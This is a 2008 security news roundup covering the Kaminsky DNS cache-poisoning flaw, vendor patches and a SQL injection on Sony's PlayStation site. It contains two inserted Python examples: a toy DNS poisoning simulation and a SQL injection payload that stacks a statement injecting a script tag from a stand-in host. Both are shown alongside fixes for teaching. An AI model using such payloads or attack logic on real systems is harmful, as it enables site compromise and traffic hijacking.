
Defense in Depth

Researcher offers insight into DNS flaw

On Tuesday, security researcher Dan Kaminsky of IOActive calmly explained in a conference call with security reporters how he first stumbled upon a recently.

What he did next is remarkable: he waited. Instead of selling the vulnerability to a company like TippingPoint through its program, wherein the company would then handle the vendor contact and resolution, Kaminsky took the responsible step of contacting the most affected vendors himself. He discussed with them how best to address a flaw that resides at the most fundamental level of how DNS currently works.

Together, Kaminsky and the vendors set a date ...

Cisco releases its DNS patches

Following a security researcher's announcement of a massive, multivendor patch release, Cisco on Tuesday issued a patch for its products vulnerable to DNS cache-poisoning attacks.

In an , Cisco cited its IOS software, Network Registrar, Application and Content Networking System, and Global Site Selector used in combination with Cisco Network Registrar among those directly affected by the vulnerability announcement.

Earlier Tuesday, Microsoft released its patch for the same DNS vulnerability.

Massive, coordinated DNS patch released

A security researcher has responsibly disclosed a fundamental flaw within the Domain Name System (DNS), the addressing scheme behind the common names used on the Internet. A resolver matches each reply to its outstanding query by a 16-bit transaction ID; with current implementations it may be possible to guess these transaction ID values in advance, forge a matching reply, and assert a malicious server as the authoritative DNS server for a popular bank or e-commerce site. The news was announced Tuesday.

Dan Kaminsky, director of penetration testing services for IOActive, found the DNS flaw earlier this year. Rather than sell the vulnerability, as some researchers have done, Kaminsky decided instead to gather the affected parties and discuss it with ...
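The race the teaser describes, as an added example that is not part of the original post or of any vendor's code: a toy resolver that matches replies by (transaction ID, source port), an attacker who triggers cache misses with throwaway labels (so no TTL wait between tries) and floods forged replies naming a rogue name server for the whole zone, and a comparison of a fixed source port against randomized ports. The model gives the resolver a properly random 16-bit ID and shows that even that is too small on its own; the zone, the rogue server name and the port range are constructed for the example.

```python
"""Toy model of the DNS cache-poisoning race behind the July 2008 patches.

A resolver accepts a reply only if its transaction ID and destination UDP port
match an outstanding query. Everything here is constructed for illustration:
the zone, the rogue name server name and the port range are assumptions.
"""
import random

BAILIWICK = "example.com"            # zone the attacker wants to take over (assumed)
ATTACKER_NS = "ns.attacker.invalid"  # hypothetical rogue name server
PORT_RANGE = (1024, 65536)           # source ports a randomizing resolver picks from


class Resolver:
    def __init__(self, randomize_port, seed=1):
        self.randomize_port = randomize_port
        self.rng = random.Random(seed)
        self.pending = {}   # (txid, port) -> qname awaiting a reply
        self.cache = {}     # owner name -> (rrtype, rdata)

    def send_query(self, qname):
        """Issue a query: the 16-bit ID is random either way, the port may not be."""
        txid = self.rng.randrange(1 << 16)
        port = self.rng.randrange(*PORT_RANGE) if self.randomize_port else 53
        self.pending[(txid, port)] = qname
        return txid, port

    def receive(self, txid, port, qname, authority):
        """Accept a reply only if it matches an outstanding query exactly.

        `authority` is an (owner, nsname) NS record. Only NS data for the zone
        the query belongs to (the bailiwick) is cached; that is what lets a
        reply for a throwaway label rewrite who serves the whole zone.
        """
        if self.pending.get((txid, port)) != qname:
            return False                      # spoofed, late or mismatched: dropped
        del self.pending[(txid, port)]
        owner, nsname = authority
        if qname.endswith("." + owner):
            self.cache[owner] = ("NS", nsname)
        return True


def search_space(randomize_port):
    """Number of equally likely (txid, port) pairs a forged reply must hit."""
    ports = PORT_RANGE[1] - PORT_RANGE[0] if randomize_port else 1
    return (1 << 16) * ports


def poison(resolver, forged_per_query, max_queries, seed=1234):
    """Run the attack; return how many triggered queries it took, or None."""
    rng = random.Random(seed)
    for n in range(1, max_queries + 1):
        # A never-seen label is always a cache miss, so the attacker gets a
        # fresh race on every query instead of waiting for a TTL to expire.
        qname = f"a{rng.randrange(1 << 32):08x}.{BAILIWICK}"
        resolver.send_query(qname)
        for _ in range(forged_per_query):
            txid = rng.randrange(1 << 16)
            port = rng.randrange(*PORT_RANGE) if resolver.randomize_port else 53
            if resolver.receive(txid, port, qname, (BAILIWICK, ATTACKER_NS)):
                return n
        resolver.pending.clear()   # the genuine reply lands first; race lost
    return None


def is_poisoned(resolver):
    """True once the cache says the attacker's server is authoritative for the zone."""
    return resolver.cache.get(BAILIWICK) == ("NS", ATTACKER_NS)


if __name__ == "__main__":
    for randomize in (False, True):
        r = Resolver(randomize_port=randomize)
        n = poison(r, forged_per_query=300, max_queries=3000)
        outcome = f"poisoned after {n} queries" if n else "not poisoned in 3000 queries"
        print(f"port randomization={randomize}: "
              f"search space {search_space(randomize):,}, {outcome}")
```

With the port fixed at 53 a forged reply has to hit one value in 65,536, so a few hundred forgeries per triggered query poison the cache in a few hundred queries; randomizing the source port multiplies the space by the number of usable ports, which is what the coordinated patches did. The throwaway-label trick is why a cached answer's TTL no longer limits the attacker: each label is a new cache miss, and the NS record in the reply is what survives.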

Microsoft fixes 9 flaws with 4 patches; none critical

Microsoft today released its or via the individual bulletins detailed below.

Entitled "Vulnerabilities in DNS Could Allow Spoofing (953230)," this bulletin is for users of Windows 2000, Windows XP, and Windows Server 2003; not affected are users of Windows Vista (both 32-bit and 64-bit editions) and Windows Server 2008. The update addresses vulnerabilities detailed in CVE-2008-1447 and CVE-2008-1454 and modifies the Windows DNS client and DNS server. Microsoft says these two vulnerabilities exist in both the DNS client and DNS server and could allow a remote attacker to redirect network traffic intended for systems on the Internet to ...

Researcher faults Apple iPhone on security updates

A leading Mac OS X researcher says Apple has not kept the iPhone operating system up to date with patches it has issued for the desktop.

The iPhone runs a stripped-down version of Mac OS X 10.5 and automatically checks for security updates. The last update for the phone, 1.1.4, was issued in February.

That means iPhone users are still vulnerable to a flaw discovered by Charlie Miller in March.

During the CanSecWest conference, Miller found and used a to win a $10,000 "Pwn to Own" contest. Apple patched Miller's Safari vulnerability for the desktop in ...

Google RatProxy looks for cross-site flaws

Google released a free tool Tuesday that should help Web developers find and fix cross-site vulnerabilities.

The tool, , is described by Google as "a semi-automated, largely passive Web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex Web 2.0 environments."

The tool is versatile, detecting and ranking a broad class of vulnerabilities. Included are script injections, cross-site trust attacks, content-serving vulnerabilities, cross-site request forgeries (XSRF), and cross-site scripting (XSS).

RatProxy runs on Linux, FreeBSD, MacOS X, and ...

Hundreds of Lithuanian Web sites defaced

Last weekend, several hundred Lithuanian Web sites were defaced with pro-Soviet and anti-Lithuanian slogans, according to .

Last Friday, Lithuanian government sites were warned of an impending Web attack and mounted appropriate defenses. Several hundred commercial sites did not, and over the weekend they took the brunt of the attack. By Monday, almost all of the sites had been restored.

As with last year's Estonian denial-of-service attacks, which followed the relocation of a Soviet war memorial in Tallinn, the new attacks appear to be politically motivated, in this case a reaction to a law outlawing the display of Soviet symbols in Lithuania. Germany has similar laws outlawing the display of Nazi symbols.

Early evidence suggests ...

Mozilla and Opera fix security flaws

On Thursday, Opera released . The new version fixes a few security vulnerabilities and resolves some stability issues. One of the fixes addresses an arbitrary code execution vulnerability that was not previously made public.

Meanwhile, Mozilla released Firefox 2.0.0.15 with a , including a few remote-code-execution vulnerabilities.

Current Firefox 2 users should, however, upgrade to Firefox 3, which includes antimalware protection and other security features.

Four security bulletins expected on Patch Tuesday

for Patch Tuesday next week. The pre-announcement is intended as a heads up for IT departments before Patch Tuesday. All four are considered important, the second-most serious ranking by the software giant.

Among the important patches, two address vulnerabilities in Windows: one could allow remote code execution, the other spoofing. Another bulletin affects Windows and Microsoft SQL Server and involves elevation of privilege. The final bulletin affects Microsoft Exchange Server and also involves elevation of privilege.

Sony PlayStation site victim of SQL-injection attack

that some visitors to the Sony PlayStation site may have been prompted to download an antivirus scanner.

Pages promoting the PlayStation games SingStar Pop and God of War contained SQL-injected code. Visitors to those specific game pages would , then a message that their computer was infected with different viruses and Trojan horses. Warned, the user would then be asked to purchase the scanner to remove the nonexistent malware.

The injected code linking to the scanner has since been removed.

Sophos said the attack could have downloaded malicious payloads, but did not.
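How one injectable statement becomes the site-wide script injection Sophos describes, as an added example that is neither Sony's code nor the Sophos analysis: a page hit counter built by string concatenation beside its parameterized form, a constructed payload that stacks a second statement appending a script tag to every row, and output encoding as the second layer that renders a tampered row harmless. The table, slugs, hostname and payload are all constructed; the batch executor stands in for drivers that accept several statements per call.

```python
"""Stored script injection via SQL injection, modelled on the 2008 mass
injections. Everything below is constructed: table, rows, hostname, payload.
"""
import html
import sqlite3

# Constructed payload. The closing quote ends the intended statement, a second
# statement appends a script tag to every blurb, and the comment marker
# swallows whatever the original query had left over.
FAKE_AV_TAG = '<script src="http://scanner.invalid/av.js"></script>'
PAYLOAD = "x'; UPDATE games SET blurb = blurb || '" + FAKE_AV_TAG + "'; --"


def make_db():
    """In-memory catalogue standing in for a game site's database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE games (
            slug  TEXT PRIMARY KEY,
            blurb TEXT NOT NULL,
            views INTEGER NOT NULL DEFAULT 0
        );
        INSERT INTO games (slug, blurb) VALUES ('singstar-pop', 'Sing along with friends.');
        INSERT INTO games (slug, blurb) VALUES ('god-of-war', 'Kratos returns.');
    """)
    return conn


def record_view_vulnerable(conn, slug):
    """Hit counter built by string concatenation.

    executescript is used here as a stand-in for a database driver that runs
    several statements per call (as the ASP / MS SQL stacks hit in 2008 did),
    so the attacker's slug is parsed as SQL rather than compared as data.
    """
    conn.executescript(f"UPDATE games SET views = views + 1 WHERE slug = '{slug}';")


def record_view_safe(conn, slug):
    """Same counter with a bound parameter: the slug is data, never SQL."""
    conn.execute("UPDATE games SET views = views + 1 WHERE slug = ?", (slug,))


def render_blurb(conn, slug, escape_output=True):
    """Page fragment for one game.

    Output encoding is the second layer: even a blurb that was tampered with
    in the database renders as inert text instead of loading a script.
    """
    row = conn.execute("SELECT blurb FROM games WHERE slug = ?", (slug,)).fetchone()
    if row is None:
        return None
    blurb = html.escape(row[0]) if escape_output else row[0]
    return f"<p>{blurb}</p>"


def blurbs(conn):
    """slug -> blurb for every row, to inspect what the injection changed."""
    return dict(conn.execute("SELECT slug, blurb FROM games ORDER BY slug"))


def views(conn, slug):
    row = conn.execute("SELECT views FROM games WHERE slug = ?", (slug,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    record_view_vulnerable(conn, PAYLOAD)       # one request poisons every row
    print(render_blurb(conn, "god-of-war", escape_output=False))
    print(render_blurb(conn, "god-of-war"))     # same row, encoded on output
    clean = make_db()
    record_view_safe(clean, PAYLOAD)            # matches no row, changes nothing
    print(blurbs(clean))
```

The parameterized version never matches a row for the payload, so nothing is written; the single-statement API most drivers default to is a further reason stacked statements fail. Output encoding does not undo the injection, but it is what would have kept already-poisoned pages from serving the scanner to visitors while the rows were cleaned up.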

Security researcher . Over the last 90 days, Google reports ...
